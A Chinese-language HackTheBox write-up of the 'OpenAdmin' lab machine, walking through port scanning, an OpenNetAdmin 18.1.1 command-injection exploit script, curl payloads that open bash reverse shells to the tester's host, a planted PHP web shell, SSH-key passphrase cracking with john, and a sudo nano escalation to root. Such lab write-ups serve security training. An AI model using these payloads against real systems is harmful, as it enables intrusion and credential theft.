HackTheBox-OpenAdmin

  • laoxinsec

    2022-09-04 20:49:56
  • 数据库开发技术
  • 原创

title: HackTheBox-OpenAdmin author: Crazyinside layout: true categories: HackTheBox cover: https://www.worldisend.com/img/OpenAdmin.png tags:

LInux

Crazy:~/HackThebox$ sudo masscan -p1-65535,U:1-65535 --rate 2000 -e tun0 10.10.10.171[sudo] crazyinside 的密码:Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-08-22 06:01:02 GMTInitiating SYN Stealth ScanScanning 1 hosts [131070 ports/host]Discovered open port 22/tcp on 10.10.10.171                                    Discovered open port 80/tcp on 10.10.10.171 Crazy:~/HackThebox/OpenAdmin$ sudo nmap -sC -sV 10.10.10.171 -oN OpenAdmin -p22,80 [sudo] crazyinside 的密码:Starting Nmap 7.92SVN ( https://ParrotOS.org ) at 2022-08-22 14:03 CSTNmap scan report for 10.10.10.171Host is up (0.096s latency).
PORT   STATE SERVICE VERSION22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: |   2048 4b98df85d17ef03dda48cdbc9200b754 (RSA)|   256 dceb3dc944d118b122b4cfdebd6c7a54 (ECDSA)|_  256 dcadca3c11315b6fe6a489347c9be550 (ED25519)80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))|_http-server-header: Apache/2.4.29 (Ubuntu)|_http-title: Apache2 Ubuntu Default Page: It worksService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://ParrotOS.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 10.83 secondszsh: segmentation fault  sudo nmap -sC -sV 10.10.10.171 -oN OpenAdmin -p22,80
Crazy:~/HackThebox/OpenAdmin$ curl -I 10.10.10.171  HTTP/1.1 200 OKDate: Mon, 22 Aug 2022 06:04:16 GMTServer: Apache/2.4.29 (Ubuntu)Last-Modified: Thu, 21 Nov 2019 14:08:45 GMTETag: "2aa6-597dbd5dcea8b"Accept-Ranges: bytesContent-Length: 10918Vary: Accept-EncodingContent-Type: text/html

80端口是Apache默认页面。

Crazy:~/HackThebox$ dirsearch -u http://10.10.10.171/
  _|. _ _  _  _  _ _|_    v0.4.2 (_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/crazyinside/.dirsearch/reports/10.10.10.171/-_22-08-22_14-04-03.txt
Error Log: /home/crazyinside/.dirsearch/logs/errors-22-08-22_14-04-03.log
Target: http://10.10.10.171/
[14:04:03] Starting: [14:04:11] 403 -  277B  - /.ht_wsr.txt[14:04:11] 403 -  277B  - /.htaccess.save[14:04:11] 403 -  277B  - /.htaccess.sample[14:04:11] 403 -  277B  - /.htaccess.bak1[14:04:11] 403 -  277B  - /.htaccess_extra[14:04:11] 403 -  277B  - /.htaccessOLD[14:04:11] 403 -  277B  - /.htaccess.orig[14:04:11] 403 -  277B  - /.htaccess_orig[14:04:11] 403 -  277B  - /.htaccess_sc[14:04:11] 403 -  277B  - /.htaccessBAK[14:04:11] 403 -  277B  - /.htaccessOLD2[14:04:11] 403 -  277B  - /.htm[14:04:11] 403 -  277B  - /.httr-oauth[14:04:11] 403 -  277B  - /.html[14:04:11] 403 -  277B  - /.htpasswd_test[14:04:11] 403 -  277B  - /.htpasswds[14:04:13] 403 -  277B  - /.php[14:04:59] 200 -   11KB - /index.html[14:05:07] 301 -  312B  - /music  ->  http://10.10.10.171/music/[14:05:09] 301 -  310B  - /ona  ->  http://10.10.10.171/ona/[14:05:18] 403 -  277B  - /server-status[14:05:18] 403 -  277B  - /server-status/

都是一些静态页面,顺着登录可以跳转到

并且顺着帮助索引能够跳转到Github,Github有说默认口令是admin:admin。

Crazy:~/HackThebox/OpenAdmin$ searchsploit opennetadmin           ----------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title                                                                                       |  Path----------------------------------------------------------------------------------------------------- ---------------------------------OpenNetAdmin 13.03.01 - Remote Code Execution                                                        | php/webapps/26682.txtOpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)                                         | php/webapps/47772.rbOpenNetAdmin 18.1.1 - Remote Code Execution                                                          | php/webapps/47691.sh----------------------------------------------------------------------------------------------------- ---------------------------------Shellcodes: No ResultsPapers: No Results

msf的好像没什么用:

msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > show options 
Module options (exploit/unix/webapp/opennetadmin_ping_cmd_injection):
   Name       Current Setting  Required  Description   ----       ---------------  --------  -----------   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit   RPORT      80               yes       The target port (TCP)   SSL        false            no        Negotiate SSL/TLS for outgoing connections   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)   TARGETURI  /ona/login.php   yes       Base path   URIPATH                     no        The URI to use for this exploit (default is random)   VHOST                       no        HTTP server virtual host

Payload options (linux/x86/meterpreter/reverse_tcp):
   Name   Current Setting  Required  Description   ----   ---------------  --------  -----------   LHOST                   yes       The listen address (an interface may be specified)   LPORT  4444             yes       The listen port

Exploit target:
   Id  Name   --  ----   0   Automatic Target

msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > set RHOSTS 10.10.10.171RHOSTS => 10.10.10.171msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > set LHOST 10.10.16.3LHOST => 10.10.16.3msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > run
[*] Started reverse TCP handler on 10.10.16.3:4444 [*] Exploiting...[*] Command Stager progress - 100.00% done (702/702 bytes)[*] Exploit completed, but no session was created.msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > exploit 
[*] Started reverse TCP handler on 10.10.16.3:4444 [*] Exploiting...[*] Command Stager progress - 100.00% done (702/702 bytes)[*] Exploit completed, but no session was created.msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > 
Crazy:~/HackThebox/OpenAdmin$ cat 47691.sh                      # Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution# Date: 2019-11-19# Exploit Author: mattpascoe# Vendor Homepage: http://opennetadmin.com/# Software Link: https://github.com/opennetadmin/ona# Version: v18.1.1# Tested on: Linux
# Exploit Title: OpenNetAdmin v18.1.1 RCE# Date: 2019-11-19# Exploit Author: mattpascoe# Vendor Homepage: http://opennetadmin.com/# Software Link: https://github.com/opennetadmin/ona# Version: v18.1.1# Tested on: Linux
#!/bin/bash
URL="${1}"while true;do echo -n "$ "; read cmd curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1done                                                                                                                                       Crazy:~/HackThebox/OpenAdmin$ 
Crazy:~/HackThebox/OpenAdmin$ curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";id;echo \"END\"&xajaxargs[]=ping" http://10.10.10.171/ona/

在页面中会回显执行的结果:

                         style="background-color: #F2F2F2; padding-left: 25px; padding-right: 25px;" width="100%" cellspacing="0" border="0" cellpadding="0">             align="left" class="padding">            
             style="border: solid 2px #000000; background-color: #FFFFFF; width: 650px; height: 350px; overflow: auto;resize: both;">                 style="padding: 4px;font-family: monospace;">BEGIN                                uid=33(www-data) gid=33(www-data) groups=33(www-data)

END

 style="background-color: #F2F2F2; padding-left: 25px; padding-right: 25px;" width="100%" cellspacing="0" border="0" cellpadding="0"> id="tooltips_extras" align="center" class="padding"> type="button" class="edit" name="Close" value="Close" onclick="removeElement('tooltips_results');">
 ]]> n="js"> 
Crazy:~/HackThebox/OpenAdmin$ curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.16.3%2F1337%200%3E%261%27;echo \"END\"&xajaxargs[]=ping" http://10.10.10.171/ona/
www-data@openadmin:/var/www/html/ona/local/config$ lsdatabase_settings.inc.php  motd.txt.example  run_installerphp
$ona_contexts=array (  'DEFAULT' =>   array (    'databases' =>     array (      0 =>       array (        'db_type' => 'mysqli',        'db_host' => 'localhost',        'db_login' => 'ona_sys',        'db_passwd' => 'n1nj4W4rri0R!',        'db_database' => 'ona_default',        'db_debug' => false,      ),    ),    'description' => 'Default data context',    'context_color' => '#D3DBFF',  ),);
?>www-data@openadmin:/var/www/html/ona/local/config$

数据库里没什么信息:

mysql> select * from users;+----+----------+----------------------------------+-------+---------------------+---------------------+| id | username | password                         | level | ctime               | atime               |+----+----------+----------------------------------+-------+---------------------+---------------------+|  1 | guest    | 098f6bcd4621d373cade4e832627b4f6 |     0 | 2022-08-22 06:31:46 | 2022-08-22 06:31:46 ||  2 | admin    | 21232f297a57a5a743894a0e4a801fc3 |     0 | 2022-08-22 06:16:34 | 2022-08-22 06:16:34 |+----+----------+----------------------------------+-------+---------------------+---------------------+

密码复用可以登录jimmy:

jimmy@openadmin:/etc/apache2/sites-enabled$ lsinternal.conf  openadmin.confjimmy@openadmin:/etc/apache2/sites-enabled$ cat internal.conf Listen 127.0.0.1:52846
 127.0.0.1:52846>    ServerName internal.openadmin.htb    DocumentRoot /var/www/internal
 mpm_itk_module>AssignUserID joanna joanna
    ErrorLog ${APACHE_LOG_DIR}/error.log    CustomLog ${APACHE_LOG_DIR}/access.log combined
jimmy@openadmin:/etc/apache2/sites-enabled$

在端口52846似乎还运行着什么服务:

Crazy:~/HackThebox/OpenAdmin$ ssh jimmy@10.10.10.171 -L 52846:localhost:52846The authenticity of host '10.10.10.171 (10.10.10.171)' can't be established.ED25519 key fingerprint is SHA256:wrS/uECrHJqacx68XwnuvI9W+bbKl+rKdSh799gacqo.This key is not known by any other namesAre you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added '10.10.10.171' (ED25519) to the list of known hosts.jimmy@10.10.10.171's password: Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
jimmy@openadmin:/var/www/internal$ lsindex.php  logout.php  main.phpjimmy@openadmin:/var/www/internal$ echo 1 > 1.txtjimmy@openadmin:/var/www/internal$ ls1.txt  index.php  logout.php  main.phpecho '' > hack.php                  jimmy@openadmin:/var/www/internal$
curl 'http://127.0.0.1:52846/hack.php?hack=bash%20-c%20%27bash%20-i%20%3E%26%20/dev/tcp/10.10.16.3/1338%200%3E%261%27'

随便哪个会话触发一下就行了:

Crazy:~/HackThebox$ nc -lvnp 1338listening on [any] 1338 ...connect to [10.10.16.3] from (UNKNOWN) [10.10.10.171] 49182bash: cannot set terminal process group (1221): Inappropriate ioctl for devicebash: no job control in this shelljoanna@openadmin:/var/www/internal$

但是这种shell会受限很多。运行sudo时候会报错。我尝试去用户目录读取了id_rsa,但在使用的过程中需要输入密码:

Crazy:~/HackThebox/OpenAdmin$ ssh2john id_rsa > hashCrazy:~/HackThebox/OpenAdmin$ john -w=/usr/share/wordlists/rockyou.txt hash Using default input encoding: UTF-8Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashesCost 2 (iteration count) is 1 for all loaded hashesWill run 8 OpenMP threadsPress 'q' or Ctrl-C to abort, almost any other key for statusbloodninjas      (id_rsa)     1g 0:00:00:02 DONE (2022-08-22 14:54) 0.4566g/s 4371Kp/s 4371Kc/s 4371KC/s bloodofyouth..bloodmabiteUse the "--show" option to display all of the cracked passwords reliablySession completed.                                                                                                                                        Crazy:~/HackThebox/OpenAdmin$ 
Crazy:~/HackThebox/OpenAdmin$ ssh -i id_rsa joanna@10.10.10.171Enter passphrase for key 'id_rsa': Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
 * Documentation:  https://help.ubuntu.com * Management:     https://landscape.canonical.com * Support:        https://ubuntu.com/advantage
  System information as of Mon Aug 22 06:50:19 UTC 2022
  System load:  0.01              Processes:             182  Usage of /:   31.0% of 7.81GB   Users logged in:       1  Memory usage: 14%               IP address for ens160: 10.10.10.171  Swap usage:   0%

 * Canonical Livepatch is available for installation.   - Reduce system reboots and improve kernel security. Activate at:     https://ubuntu.com/livepatch
39 packages can be updated.11 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Tue Jul 27 06:12:07 2021 from 10.10.14.15joanna@openadmin:~$ lspwk.py  user.txtjoanna@openadmin:~$ sudo -lMatching Defaults entries for joanna on openadmin:    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH",    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, mail_badpass
User joanna may run the following commands on openadmin:    (ALL) NOPASSWD: /bin/nano /opt/privjoanna@openadmin:~$

这个提权,用的nano编辑器执行命令的效果,但是直接输入命令会被冻结,需要输入reset; /bin/sh 1>&0 2>&0,就会出现root标志性#:




Command to execute: reset; /bin/sh 1>&0 2>&0# id                                                                                        uid=0(root) gid=0(root) groups=0(root)                              ^X Read File# cat /root/root.txt                                                M-F New Buffer2984.................................#
请使用浏览器的分享功能分享到微信等